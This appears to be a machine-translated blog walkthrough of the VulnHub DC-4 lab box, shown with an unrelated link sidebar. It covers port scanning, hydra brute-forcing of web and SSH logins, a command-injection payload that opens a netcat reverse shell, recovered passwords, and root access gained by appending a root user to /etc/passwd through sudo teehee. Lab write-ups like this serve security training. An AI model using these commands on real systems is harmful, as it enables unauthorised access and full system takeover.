当前位置:网站首页>【Try to Hack】vulnhub DC4
【Try to Hack】vulnhub DC4
2022-07-01 17:31:00 【Happy star】
Blog home page : Happy star The blog home page of
Series column :Try to Hack
Welcome to focus on the likes collection ️ Leaving a message.
Starting time :2022 year 7 month 1 Japan
The author's level is very limited , If an error is found , Please let me know , thank !
The target is in bridging mode by default
kali Set to bridge mode
The host found netdiscover
Drone aircraft ip by 192.168.0.151
namp -p- -A 192.168.0.151
ssh Service and http service
visit 80 port 
dirb Regular directory scanning dirb http://192.168.0.151
Two directories 403
whatweb http://192.168.0.151
This page doesn't work cwel Crawl dictionary
Upper weak password
On hydra, use john A dictionary with me /usr/share/john/password.lst
Known user name is adminhydra -l admin -P /usr/share/john/password.lst 192.168.0.151 http-get /


Can execute orders , But the command is dead
Grab the bag and have a look 
Yes indeed 
Bounces shellradio=nc+192.168.0.106+233+-e+/bin/sh&submit=Run
nc -lvvp 233
Pack 
python -c 'import pty;pty.spawn("/bin/bash")'
Get an interactive shell
ls /home
There are three users 
Turn over one by one
Only jim Can see 

Password 
Continue to turn jim Other documents under 
No permission to view mbox
Now look ssh service
Then save the three users as user.txt.
I directly copied the password backup file to kali In the attack plane
use hydra Blast ssh service hydra -L user.txt -P password.txt 192.168.0.151 ssh -t 60 
ssh Blast out a user
jim:jibril04
Log in and have a look ssh [email protected]
Login successful
You can see mbox
This is email ,root to jim Email sent , But there is no email content
stay /var/jim Found inside .( This /var/mail Is the default self-contained folder , It may be used to save emails )
Got it charles Password
Log in 

nothing
Now we can only consider raising the right
To us charles This user , Then use this user to raise rights 
test.sh have suid jurisdiction , But I don't know when it will run , I haven't seen it work .
First, consider using ping Raise the right , But it doesn't seem to work
use sudosudo -l

echo "happy::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
Construct a user with root jurisdiction , write in /etc/passwd

边栏推荐
- Cookies and session keeping technology
- Pytest learning notes (13) -allure of allure Description () and @allure title()
- PHP实现敏感词过滤系统「建议收藏」
- 中国一次性卫生用品生产设备行业深度调研报告(2022版)
- 股票万1免5证券开户是合理安全的吗,怎么讲
- 多线程使用不当导致的 OOM
- Determine whether the linked list is a palindrome linked list
- (28) Shape matching based on contour features
- Code example of libcurl download file
- National Security Agency (NSA) "sour Fox" vulnerability attack weapon platform technical analysis report
猜你喜欢

【C语言基础】12 字符串

(28) Shape matching based on contour features

Free lottery | explore the future series of blind box digital copyright works of "abadou" will be launched on the whole network!
![[pyg] document summary and project experience (continuously updated](/img/b4/75da8c3e657069be4e3e3bfd5b2dc0.png)
[pyg] document summary and project experience (continuously updated

为什么你要考虑使用Prisma

LeetCode中等题之TinyURL 的加密与解密

SQL question brushing 584 Looking for user references

Cookies and session keeping technology

Replace UUID, nanoid is faster and safer!

Computed property “xxx“ was assigned to but it has no setter.
随机推荐
Encryption and decryption of tinyurl in leetcode
Official announcement! Hong Kong University of science and Technology (Guangzhou) approved!
How to write good code - Defensive Programming Guide
C language implementation of sum of two numbers [easy to understand]
Redis distributed lock
存在安全隐患 起亚召回部分K3新能源
ACL 2022 | 分解的元学习小样本命名实体识别
MySQL learning summary
走进微信小程序
多线程使用不当导致的 OOM
【splishsplash】关于如何在GUI和json上接收/显示用户参数、MVC模式和GenParam
中国氮化硅陶瓷基板行业研究与投资前景报告(2022版)
The amazing open source animation library is not only awesome, but also small
Develop those things: easycvr cluster device management page function display optimization
Object. fromEntries()
中国PBAT树脂市场预测及战略研究报告(2022版)
可迭代对象与迭代器、生成器的区别与联系
《中国智慧环保产业发展监测与投资前景研究报告(2022版)》
提交review时ReviewBoard出现500错误解决方法
Radhat builds intranet Yum source server